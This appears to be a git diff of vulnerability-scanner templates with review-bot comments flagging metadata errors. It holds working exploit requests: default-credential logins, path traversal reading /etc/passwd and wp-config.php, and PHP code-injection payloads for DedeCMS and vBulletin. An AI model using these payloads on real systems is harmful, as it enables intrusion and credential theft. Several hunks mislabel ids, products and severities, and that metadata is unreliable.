HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=login&username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"session.id"' + - '"success"' + condition: and + + - type: word + words: + - 'azkaban.browser.session.id' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - azkaban.browser.session.id 
diff --git a/poc/auth/canal-default-login-848.yaml b/poc/auth/canal-default-login-848.yaml index a4c4a1b801..733d7d16f3 100644 --- a/poc/auth/canal-default-login-848.yaml +++ b/poc/auth/canal-default-login-848.yaml @@ -1,11 +1,16 @@ id: canal-default-login - info: name: Alibaba Canal Default Login author: pdteam + description: An Alibaba Canal default login was discovered. severity: high + reference: + - https://github.com/alibaba/canal/wiki/ClientAdapter + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: alibaba,default-login - requests: - raw: - | @@ -14,22 +19,21 @@ requests: Content-Type: application/json {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork payloads: user: - admin pass: - 123456 - matchers-condition: and matchers: - type: status status: - 200 - - type: word condition: and words: - 'data":{"token"' - '"code":20000' + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/cisco-systems-login.yaml b/poc/auth/cisco-systems-login.yaml index 25607b3bbf..96ae7b9ee4 100644 --- a/poc/auth/cisco-systems-login.yaml +++ b/poc/auth/cisco-systems-login.yaml @@ -2,11 +2,12 @@ id: cisco-systems-login info: name: Cisco Systems Login - author: dhiyaneshDk + author: dhiyaneshDk,idealphase severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Systems Login"' + shodan-query: http.title:"Cisco Systems Login" + google-query: intitle:"Cisco Systems Login" + tags: panel,cisco requests: - method: GET @@ -18,8 +19,14 @@ requests: - type: word part: body words: - - "Cisco Systems Login" + - "Cisco Systems Login" - type: status status: - 200 + + extractors: + - type: regex + group: 1 + regex: + - '' + redirects: true matchers: - type: dsl dsl: - - 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")' + - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\">")' 
diff --git a/poc/cve/CVE-2018-2893.yaml b/poc/cve/CVE-2018-2893.yaml index 94bfcc5ead..b4cd70ff8e 100644 --- a/poc/cve/CVE-2018-2893.yaml +++ b/poc/cve/CVE-2018-2893.yaml @@ -1,18 +1,25 @@ id: CVE-2018-2893 info: - name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893) + name: Oracle WebLogic Server - Remote Code Execution author: milo2012 severity: critical - description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). - reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + description: | + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + reference: + - https://www.anquanke.com/post/id/152164 + - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + - https://nvd.nist.gov/vuln/detail/CVE-2018-2893 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-2893 tags: cve,cve2018,weblogic,network,deserialization,rce,oracle + metadata: + max-request: 1 -network: +tcp: - inputs: - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" 
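Review bot: The rewritten `description` names the affected subcomponent as "Web Services", while the line it replaces said "WLS Core Components"; nothing else in the hunk explains the change, and the probe still speaks T3. Unless the vendor advisory in the new reference list says otherwise, I would keep the original wording, `subcomponent: WLS Core Components`. The `tcp:` block continues outside this hunk.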
@@ -35,3 +42,5 @@ network: part: raw words: - "StreamMessageImpl cannot be cast to weblogic" + +# Enhanced by mp on 2022/04/14 diff --git a/poc/cve/CVE-2018-5230.yaml b/poc/cve/CVE-2018-5230.yaml index 78ca057594..3073e580b5 100644 --- a/poc/cve/CVE-2018-5230.yaml +++ b/poc/cve/CVE-2018-5230.yaml @@ -4,6 +4,15 @@ info: name: Atlassian Confluence Status-List XSS author: madrobot severity: medium + tags: cve,cve2018,atlassian,confluence,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-5230 + cwe-id: CWE-79 + description: "The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified." + reference: + - https://jira.atlassian.com/browse/JRASERVER-67289 requests: - method: GET diff --git a/poc/cve/CVE-2018-5233.yaml b/poc/cve/CVE-2018-5233.yaml index 611c7a3a1e..6dd9374e44 100644 --- a/poc/cve/CVE-2018-5233.yaml +++ b/poc/cve/CVE-2018-5233.yaml @@ -8,11 +8,6 @@ info: Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233 tags: cve,cve2018,xss,grav - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-5233 - cwe-id: CWE-79 requests: - method: GET diff --git a/poc/cve/CVE-2018-6910.yaml b/poc/cve/CVE-2018-6910.yaml index 806d1a98c2..03cc1ee5c9 100644 --- a/poc/cve/CVE-2018-6910.yaml +++ b/poc/cve/CVE-2018-6910.yaml 
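Review bot: In the CVE-2018-5230 hunk the added `description` and reference describe an XSS in the Jira issue collector, but the unchanged `name` reads "Atlassian Confluence Status-List XSS" and the added tags include `confluence`. A reader cannot tell from the metadata which product a hit refers to. I would align them, for example `tags: cve,cve2018,atlassian,jira,xss` plus a name that mentions Jira, after checking which endpoint the request (outside this hunk) actually probes.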
@@ -1,27 +1,14 @@ id: CVE-2018-6910 info: - name: DedeCMS 5.7 - Path Disclosure + name: DedeCMS 5.7 path disclosure author: pikpikcu - severity: high + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-6910 description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-6910 - - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md - - https://kongxin.gitbook.io/dedecms-5-7-bug/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-6910 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-6910 - cwe-id: CWE-668 - cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* - epss-score: 0.03033 tags: cve,cve2018,dedecms - metadata: - max-request: 1 -http: +requests: - method: GET path: - "{{BaseURL}}/include/downmix.inc.php" @@ -39,5 +26,3 @@ http: - type: status status: - 200 - -# Enhanced by mp on 2022/07/08 diff --git a/poc/cve/CVE-2018-7700.yaml b/poc/cve/CVE-2018-7700.yaml index de3d622d4c..7ecfd09be8 100644 --- a/poc/cve/CVE-2018-7700.yaml +++ b/poc/cve/CVE-2018-7700.yaml 
@@ -1,27 +1,38 @@ id: CVE-2018-7700 info: - name: DedeCMS V5.7SP2 RCE + name: DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution author: pikpikcu severity: high - reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ + description: | + DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code. + reference: + - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-7700 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2018-7700 + cwe-id: CWE-352 tags: cve,cve2018,dedecms,rce + metadata: + max-request: 1 -requests: +http: - method: GET path: - - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" + - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}" matchers-condition: and matchers: - type: word - words: - - "phpinfo" - - "PHP Version" part: body - condition: and + words: + - "4cc32a3a81d2bb37271934a48ce4468a" - type: status status: - 200 + +# Enhanced by mp on 2022/06/16 diff --git a/poc/cve/CVE-2018-8033.yaml b/poc/cve/CVE-2018-8033.yaml index 55f1fd7a8c..8904dd11ea 100644 --- a/poc/cve/CVE-2018-8033.yaml +++ b/poc/cve/CVE-2018-8033.yaml 
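Review bot: The word matcher now depends on the literal `4cc32a3a81d2bb37271934a48ce4468a` with nothing saying where the value comes from. Presumably it is the MD5 of the string the new payload echoes; a comment above the word, `# md5("CVE-2018-7700"), printed by the injected echo`, would let a maintainer re-derive it if the marker string ever changes. The digest should be recomputed once before merging, since a mistyped character would silently turn the check into a permanent false negative.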
@@ -6,13 +6,6 @@ info: severity: high description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04 tags: cve,cve2018,apache,ofbiz,xxe - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2018-8033 - cwe-id: CWE-200 - reference: - - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E requests: - raw: diff --git a/poc/cve/CVE-2019-13396.yaml b/poc/cve/CVE-2019-13396.yaml index c6ef0512e4..baf97b5f61 100644 --- a/poc/cve/CVE-2019-13396.yaml +++ b/poc/cve/CVE-2019-13396.yaml 
@@ -1,51 +1,40 @@ -id: CVE-2019-13396 +id: CVE-2019-1336 info: - name: FlightPath Local File Inclusion - author: 0x_Akoko,daffainfo - severity: medium - description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability. - reference: - - https://www.exploit-db.com/exploits/47121 - - https://www.cvedetails.com/cve/CVE-2019-13396/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-13396 - - http://getflightpath.com/node/2650 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2019-13396 - cwe-id: CWE-22 - tags: cve,cve2019,flightpath,lfi + name: Weblogic RCE GET request + author: medbsq + severity: critical + # link: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf + requests: - raw: - - | - GET /login HTTP/1.1 - Host: {{Hostname}} - - - | - POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + - | + POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + + callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D¤t_student_id=&user=test&password=test&btn_submit=Login - callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd + - | + POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 + Host: {{Hostname}} + 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + + callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd + matchers-condition: and matchers: - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - - extractors: - - type: regex - name: token part: body - group: 1 - internal: true regex: - - "idden' name='form_token' value='([a-z0-9]+)'>" + - "root:[x*]:0:0:" \ No newline at end of file diff --git a/poc/cve/CVE-2019-14205.yaml b/poc/cve/CVE-2019-14205.yaml index 17d3999981..f1cfd7b265 100644 --- a/poc/cve/CVE-2019-14205.yaml +++ b/poc/cve/CVE-2019-14205.yaml 
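Review bot: The new `info` block no longer describes what the requests do: the file is CVE-2019-13396.yaml and both requests still post to `/flightpath/index.php`, yet the id becomes `CVE-2019-1336`, the name "Weblogic RCE GET request", the severity `critical`, and the `# link:` comment points at a CVE-2020-14882 write-up. Any finding would be filed under the wrong product and severity, so I would restore `id: CVE-2019-13396`, `name: FlightPath Local File Inclusion` and `severity: medium`. The hunk also replaces the extracted `{{token}}` with one fixed `form_token` value, which installations that issue their own token will presumably reject, turning the check into a false negative. The first request body contains `¤t_student_id`, which looks like a mis-decoded `&current_student_id`. The CVE-2019-14205, CVE-2019-5418 and CVE-2019-7256 hunks likewise change ids away from their file names (`CVE-2019-14205-1`, `CVE-2019-5418-3`, `cve-2019-7256`), while the CVE-2019-19985 hunk removes such a suffix.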
@@ -1,45 +1,24 @@ -id: CVE-2019-14205 - +id: CVE-2019-14205-1 info: - name: Multiples Wordpress LFI - author: medbsq - severity: critical -# https://www.cvebase.com/cve/2019/14205 + name: WordPress Ext Adaptive Images LFI + author: pikpikcu + severity: high + tags: cve,cve2019,wordpress,wp-plugin,lfi + reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205 + requests: - - method: POST + - method: GET path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download" - - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php" - - "{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php" - - "{{BaseURL}}/?aam-media=wp-config.php" - - "{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php" - - "{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php" - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php" - - 
"{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd" - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php" - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php" - - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - - - matchers-condition: or + - '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php' + + matchers-condition: and matchers: - type: word words: - - "DB_USER" + - "DB_NAME" - "DB_PASSWORD" + part: body condition: and - - type: word - words: - - "root:" - - "bin:x:" - condition: and - part: body \ No newline at end of file + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2019-15043.yaml b/poc/cve/CVE-2019-15043.yaml index 5c6553f16d..2a4be1541c 100644 --- a/poc/cve/CVE-2019-15043.yaml +++ b/poc/cve/CVE-2019-15043.yaml 
@@ -1,59 +1,23 @@ id: CVE-2019-15043 - info: - name: Grafana - Improper Access Control - author: Joshua Rogers - severity: high - description: | - Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service. - reference: - - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 - - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - - https://bugzilla.redhat.com/show_bug.cgi?id=1746945 - - https://aaron-hoffmann.com/posts/cve-2019-15043/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043 - - https://nvd.nist.gov/vuln/detail/CVE-2019-15043 - remediation: Upgrade to 6.3.4 or higher. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2019-15043 - cwe-id: CWE-284 - metadata: - max-request: 1 - shodan-query: title:"Grafana" - verified: "true" - tags: cve,cve2019,grafana,dos,intrusive - -variables: - payload: '{{repeat("A", 4000)}}' - -http: - - method: POST - path: - - "{{BaseURL}}/api/snapshots" + author: bing0o + name: Grafana unauthenticated API + severity: medium +requests: + - body: >- + {"dashboard": + {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": + [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": + 3600} headers: Content-Type: application/json - body: '{"dashboard": {"name":"{{payload}}"}}' - - matchers-condition: and + Host: '{{Hostname}}' + User-Agent: Mozilla/5.0 matchers: - - type: word - part: body - words: - - '"deleteUrl":' - - '"deleteKey":' - - '"key":' - - '"url":' - condition: and - - - type: word - part: header + - part: body + type: word words: - - "application/json" - - - type: status - status: - - 200 - -# Enhanced by md on 2023/04/12 + - deleteKey + method: POST + path: + - 
'{{BaseURL}}/api/snapshots' diff --git a/poc/cve/CVE-2019-16759.yaml b/poc/cve/CVE-2019-16759.yaml index 7e878320ed..329277e986 100644 --- a/poc/cve/CVE-2019-16759.yaml +++ b/poc/cve/CVE-2019-16759.yaml 
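Review bot: The replacement request still POSTs a dashboard body with `"expires": 3600` to `/api/snapshots`, so it creates an object on the scanned host, but the new `info` block has no `tags` line at all. The `intrusive` marker from the old side is therefore gone, and scans configured to exclude intrusive templates will now run this one. I would add `tags: cve,cve2019,grafana,intrusive`. The single word matcher `deleteKey`, with no status or content-type check, is also much looser than the four-key, JSON-header and 200 conditions it replaces, so a hit on any response containing that word becomes possible.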
@@ -1,25 +1,46 @@ id: CVE-2019-16759 info: - name: 0day RCE in vBulletin v5.0.0-v5.5.4 - author: dwisiswant0 - severity: high + name: vBulletin 5.0.0-5.5.4 - Remote Command Execution + author: madrobot + severity: critical + description: vBulletin 5.0.0 through 5.5.4 is susceptible to a remote command execution vulnerability via the widgetConfig parameter in an ajax/render/widget_php routestring request. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + reference: + - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/ + - https://seclists.org/fulldisclosure/2019/Sep/31 + - https://www.theregister.co.uk/2019/09/24/vbulletin_vbug_zeroday/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-16759 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-16759 + cwe-id: CWE-94 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* + epss-score: 0.97528 + metadata: + max-request: 1 + shodan-query: http.component:"vBulletin" + verified: "true" + tags: cve,cve2019,rce,kev,seclists,vbulletin -requests: +http: - raw: - | - POST /index.php?routestring=ajax/render/widget_php HTTP/1.1 + POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit; - - | - POST / HTTP/1.1 + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B - {"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"} matchers-condition: and matchers: + + - type: word + words: + - "addcc9f9f2f40e2e6aca3079b73d9d17" + - type: status status: - 200 - - type: word - words: - - "nonexistent:1337" + +# Enhanced by md on 2023/03/20 
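Review bot: The added `description` says the flaw is reached "via the widgetConfig parameter in an ajax/render/widget_php routestring request", but the new raw request posts `subWidgets[0][template]=widget_php` to `/ajax/render/widget_tabbedcontainer_tab_panel`, and the first reference URL is titled for cve-2020-7373. As written, a hit may indicate a different issue from the one in `cve-id`, which matters when the result is used to verify patching for CVE-2019-16759. Either the description and references should be reworded to match the request, or the request should return to the `routestring=ajax/render/widget_php` form while keeping the md5 marker.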
diff --git a/poc/cve/CVE-2019-16997.yaml b/poc/cve/CVE-2019-16997.yaml index 17de819532..51cf381a35 100644 --- a/poc/cve/CVE-2019-16997.yaml +++ b/poc/cve/CVE-2019-16997.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter. + remediation: | + Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. reference: - https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/2 - https://nvd.nist.gov/vuln/detail/CVE-2019-16997 @@ -13,9 +15,16 @@ info: cvss-score: 7.2 cve-id: CVE-2019-16997 cwe-id: CWE-89 + epss-score: 0.24401 + epss-percentile: 0.96156 + cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: metinfo + product: metinfo tags: metinfo,sqli,cve,cve2019 -requests: +http: - raw: - | POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1 @@ -26,6 +35,7 @@ requests: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -37,4 +47,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/06/14 +# digest: 490a004630440220530e338d4b454bae6e416c402368e4b09d12d51bec871f16084987ed9e4a73b1022016b50bae9b5e55a9e7254b47ef9a6964e0591c8f80b7f15a41fbbeccc3f0c06c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-19781.yaml b/poc/cve/CVE-2019-19781.yaml index fc56780fbf..c9c986166b 100644 --- a/poc/cve/CVE-2019-19781.yaml +++ b/poc/cve/CVE-2019-19781.yaml 
@@ -1,38 +1,15 @@ id: CVE-2019-19781 info: - name: Citrix ADC and Gateway - Directory Traversal - author: organiccrap,geeknik - severity: critical - description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities. - reference: - - https://support.citrix.com/article/CTX267027 - - https://nvd.nist.gov/vuln/detail/CVE-2019-19781 - - https://www.kb.cert.org/vuls/id/619785 - - http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-19781 - cwe-id: CWE-22 - epss-score: 0.97542 - metadata: - max-request: 1 - tags: lfi,kev,packetstorm,cve,cve2019,citrix + name: Citrix ADC Directory Traversal + author: organiccrap + severity: high -http: +requests: - method: GET path: - "{{BaseURL}}/vpn/../vpns/cfg/smb.conf" - - matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "[global]" - -# Enhanced by mp on 2022/05/03 diff --git a/poc/cve/CVE-2019-19985.yaml b/poc/cve/CVE-2019-19985.yaml index 7fd75869d3..da9611d488 100644 --- a/poc/cve/CVE-2019-19985.yaml +++ b/poc/cve/CVE-2019-19985.yaml @@ -1,11 +1,17 @@ -id: CVE-2019-19985-1 +id: CVE-2019-19985 info: name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download - author: KBA@SOGETI_ESEC, madrobot & dwisiswant0 + author: KBA@SOGETI_ESEC,madrobot,dwisiswant0 severity: medium + description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure. reference: https://www.exploit-db.com/exploits/48698 tags: cve,cve2019,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-19985 + cwe-id: CWE-862 requests: - method: GET 
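Review bot: With `matchers-condition: and` and the status matcher removed, the CVE-2019-19781 template now fires on any response that contains `[global]`, whatever the status code, which invites false positives from error pages or unrelated content. The hunk also lowers `severity` from critical to high while deleting the classification that carried `cvss-score: 9.8`. I would keep the old pair of matchers (status `200` together with the word match) and leave `severity: critical`.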
diff --git a/poc/cve/CVE-2019-20141.yaml b/poc/cve/CVE-2019-20141.yaml index 43d20edb98..dd523ce89a 100644 --- a/poc/cve/CVE-2019-20141.yaml +++ b/poc/cve/CVE-2019-20141.yaml @@ -5,13 +5,7 @@ info: author: knassar702 severity: medium description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter. - reference: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html tags: cve,cve2019,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2019-20141 - cwe-id: CWE-79 requests: - method: GET diff --git a/poc/cve/CVE-2019-5418.yaml b/poc/cve/CVE-2019-5418.yaml index 282d18d0cc..aa88fe20e3 100644 --- a/poc/cve/CVE-2019-5418.yaml +++ b/poc/cve/CVE-2019-5418.yaml @@ -1,4 +1,4 @@ -id: CVE-2019-5418 +id: CVE-2019-5418-3 info: name: Rails Information Leak diff --git a/poc/cve/CVE-2019-6112.yaml b/poc/cve/CVE-2019-6112.yaml index 5b12bbdb90..651caad780 100644 --- a/poc/cve/CVE-2019-6112.yaml +++ b/poc/cve/CVE-2019-6112.yaml @@ -5,13 +5,7 @@ info: author: dwisiswant0 severity: medium description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field). - reference: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b tags: cve,cve2019,wordpress,wp-plugin,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2019-6112 - cwe-id: CWE-79 requests: - method: GET diff --git a/poc/cve/CVE-2019-7256.yaml b/poc/cve/CVE-2019-7256.yaml index d5fb7ff1cf..35b95c1ccd 100644 --- a/poc/cve/CVE-2019-7256.yaml +++ b/poc/cve/CVE-2019-7256.yaml 
